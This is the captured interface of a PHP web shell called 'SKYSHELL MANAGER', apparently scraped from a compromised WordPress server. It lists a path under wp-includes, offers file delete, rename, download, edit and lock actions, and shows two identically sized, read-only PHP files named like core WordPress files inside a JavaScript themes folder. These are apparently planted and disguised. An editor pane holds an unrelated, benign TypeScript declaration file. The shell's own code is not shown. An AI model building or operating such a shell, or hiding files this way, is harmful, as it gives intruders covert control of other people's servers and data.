📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: CachedSource.d.ts
import { RawSourceMap } from 'source-map'; import { CachedData, MapOptions } from '.'; import Source = require('./Source'); /** * Decorates a Source and caches returned results of map, source, size and sourceAndMap in memory. * Every other operation is delegated to the wrapped Source. */ declare class CachedSource extends Source { constructor(source: null | (() => Source), cachedData: CachedData); constructor(source: Source); map(options?: MapOptions): RawSourceMap; original(): Source; getCachedData(): CachedData; } export = CachedSource;
Save